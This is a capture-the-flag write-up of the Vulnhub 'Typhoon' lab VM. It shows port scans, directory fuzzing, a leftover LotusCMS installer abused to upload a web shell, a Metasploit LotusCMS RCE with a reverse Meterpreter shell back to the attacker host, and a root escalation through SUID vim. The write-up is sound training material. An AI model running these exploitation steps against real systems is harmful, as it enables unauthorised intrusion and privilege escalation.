Typhoon from Vulnhub, 5 minutes to root

Typhoon from vulnhub (https://www.vulnhub.com/entry/typhoon-102,267/) is extremely vulnerable VM. I’m sure, there’re more than one way to get privileged shell. I’ll describe fastest and easiest.

So, let’s begin with nmap

 

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-19 13:34 EET
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 13:34
Scanning typhoon.local (192.168.56.4) [1 port]
Completed ARP Ping Scan at 13:34, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:34
Scanning typhoon.local (192.168.56.4) [1000 ports]
Discovered open port 110/tcp on 192.168.56.4
Discovered open port 22/tcp on 192.168.56.4
Discovered open port 80/tcp on 192.168.56.4
Discovered open port 445/tcp on 192.168.56.4
Discovered open port 111/tcp on 192.168.56.4
Discovered open port 8080/tcp on 192.168.56.4
Discovered open port 143/tcp on 192.168.56.4
Discovered open port 53/tcp on 192.168.56.4
Discovered open port 21/tcp on 192.168.56.4
Discovered open port 995/tcp on 192.168.56.4
Discovered open port 3306/tcp on 192.168.56.4
Discovered open port 25/tcp on 192.168.56.4
Discovered open port 993/tcp on 192.168.56.4
Discovered open port 139/tcp on 192.168.56.4
Discovered open port 2049/tcp on 192.168.56.4
Discovered open port 631/tcp on 192.168.56.4
Discovered open port 5432/tcp on 192.168.56.4
Completed SYN Stealth Scan at 13:34, 0.07s elapsed (1000 total ports)
Initiating Service scan at 13:34
Scanning 17 services on typhoon.local (192.168.56.4)
Completed Service scan at 13:34, 14.02s elapsed (17 services on 1 host)
NSE: Script scanning 192.168.56.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:34
Completed NSE at 13:34, 0.01s elapsed
Nmap scan report for typhoon.local (192.168.56.4)
Host is up, received arp-response (0.000046s latency).
Scanned at 2019-01-19 13:34:30 EET for 14s
Not shown: 983 closed ports
Reason: 983 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.2
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
53/tcp open domain syn-ack ttl 64 ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
631/tcp open ipp syn-ack ttl 64 CUPS 1.7
993/tcp open ssl/imaps? syn-ack ttl 64
995/tcp open ssl/pop3s? syn-ack ttl 64
2049/tcp open nfs_acl syn-ack ttl 64 2-3 (RPC #100227)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
5432/tcp open postgresql syn-ack ttl 64 PostgreSQL DB 9.3.3 - 9.3.5
8080/tcp open http syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:35:9F:B3 (Oracle VirtualBox virtual NIC)
Service Info: Hosts: typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.096KB)

Wow. A lot of services. I chose to start with HTTP, that’s my favorite.

Initial page doesn’t look so helpful, so I launched wfuzz to see something hidden.

root@kali:~# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt typhoon.local/FUZZ


Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer *
********************************************************

Target: http://typhoon.local/FUZZ
Total requests: 20469

==================================================================
ID Response Lines Word Chars Payload
==================================================================

000016: C=403 10 L 30 W 289 Ch ".htpasswd"
000015: C=403 10 L 30 W 289 Ch ".htaccess"
002716: C=301 9 L 28 W 314 Ch "assets"
003976: C=301 9 L 28 W 316 Ch "calendar"
004349: C=403 10 L 30 W 288 Ch "cgi-bin/"
004757: C=301 9 L 28 W 311 Ch "cms"
006432: C=301 9 L 28 W 314 Ch "drupal"
010028: C=301 9 L 28 W 318 Ch "javascript"
013833: C=301 9 L 28 W 318 Ch "phpmyadmin"
015551: C=200 2 L 4 W 37 Ch "robots.txt"
016215: C=403 10 L 30 W 293 Ch "server-status"

Total time: 18.12704
Processed Requests: 20469
Filtered Requests: 20458
Requests/sec.: 1129.196

cms folder contains installation of quite old Lotus CMS. I discovered two ways to get in.

As it can be seen from following wfuzz output, install.php left undeleted. This script allows to overwrite admin credentials. Using admin credentials, I was able to utilize File Manager module to upload my shell. Although /cms/data/files/ folder is forbidden by /cms/data/.htaccess, CMS admin still able to place his own .htaccess to /cms/data/files. Such behavior allowed me to upload shell to http://typhoon.local/cms/data/files/index.php

root@kali:~# wfuzz -t 64 --hc 404 -w /usr/share/wordlists/dirb/big.txt typhoon.local/cms/FUZZ.php

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: http://typhoon.local/cms/FUZZ.php
Total requests: 20469

==================================================================
ID	Response   Lines      Word         Chars          Payload    
==================================================================

000015:  C=403     10 L	      30 W	    297 Ch	  ".htaccess"
000016:  C=403     10 L	      30 W	    297 Ch	  ".htpasswd"
009563:  C=200     35 L	     136 W	   1587 Ch	  "index"
009721:  C=200     48 L	     150 W	   1968 Ch	  "install"
015719:  C=200      1 L	       5 W	    108 Ch	  "s"
018727:  C=200      0 L	       2 W	     18 Ch	  "update"

Total time: 18.76912
Processed Requests: 20469
Filtered Requests: 20463
Requests/sec.: 1090.567

Second way is Metasploit. It’s bundled with nice RCE exploit for Lotus CMS, which even doesn’t need authorization.

root@kali:~# msfconsole 
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v4.17.33-dev                         ]
+ -- --=[ 1843 exploits - 1046 auxiliary - 320 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > info

       Name: LotusCMS 3.0 eval() Remote Command Execution
     Module: exploit/multi/http/lcms_php_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-03-03

Provided by:
  dflah_ 
  sherl0ck_ 
  sinn3r 

Available targets:
  Id  Name
  --  ----
  0   Automatic LotusCMS 3.0

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  URI      /lcms/           yes       URI
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 4000
  Avoid: 1 characters

Description:
  This module exploits a vulnerability found in Lotus CMS 3.0's 
  Router() function. This is done by embedding PHP code in the 'page' 
  parameter, which will be passed to a eval call, therefore allowing 
  remote code execution. The module can either automatically pick up a 
  'page' parameter from the default page, or manually specify one in 
  the URI option. To use the automatic method, please supply the URI 
  with just a directory path, for example: "/lcms/". To manually 
  configure one, you may do: "/lcms/somepath/index.php?page=index"

References:
  https://cvedetails.com/cve/CVE-2011-0518/
  OSVDB (75095)
  http://secunia.com/secunia_research/2011-21/

msf exploit(multi/http/lcms_php_exec) > set RHOST typhoon.local
RHOST => typhoon.local
msf exploit(multi/http/lcms_php_exec) > set URI /cms/
URI => /cms/
msf exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.56.3:4444 
[*] Using found page param: /cms/index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38247 bytes) to 192.168.56.4
[*] Meterpreter session 1 opened (192.168.56.3:4444 -> 192.168.56.4:46218) at 2019-01-19 14:32:11 +0200


meterpreter > 
meterpreter > shell
Process 28293 created.
Channel 0 created.
id; uname -a; pwd;
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Linux typhoon.local 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
/var/www/html/cms

That’s it. I got in.

Now root time.

www-data@typhoon:/var/www/html/cms$ find / -type f -perm /u=s,g=s 2>/dev/null
find / -type f -perm /u=s,g=s 2>/dev/null
/usr/sbin/postqueue
/usr/sbin/postdrop
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/head
/usr/bin/lockfile
/usr/bin/crontab
/usr/bin/mail-unlock
/usr/bin/expiry
/usr/bin/newgrp
/usr/bin/bsd-write
/usr/bin/mail-touchlock
/usr/bin/mlocate
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/chsh
/usr/bin/lppasswd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/screen
/usr/bin/wall
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mail-lock
/usr/bin/mutt_dotlock
/usr/bin/mtr
/usr/bin/dotlockfile
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/vim.basic
/usr/bin/traceroute6.iputils
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/utempter/utempter
/usr/lib/authbind/helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/sbin/mount.cifs
/sbin/unix_chkpwd
/sbin/mount.nfs
/bin/fusermount
/bin/ping6
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/vim.basic is suid, lol.
By simply pressing ESC and issuing :sh command I became root.
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
# cat /root/root-flag 
cat /root/root-flag


Typhoon_r00t3r!


# cat /home/admin/.ssh/secr3t
cat /home/admin/.ssh/secr3t


ph00n_typ_p0st_flag!


# 
w00t-w00t. Another one pwned.
Tags:  ,

Leave a reply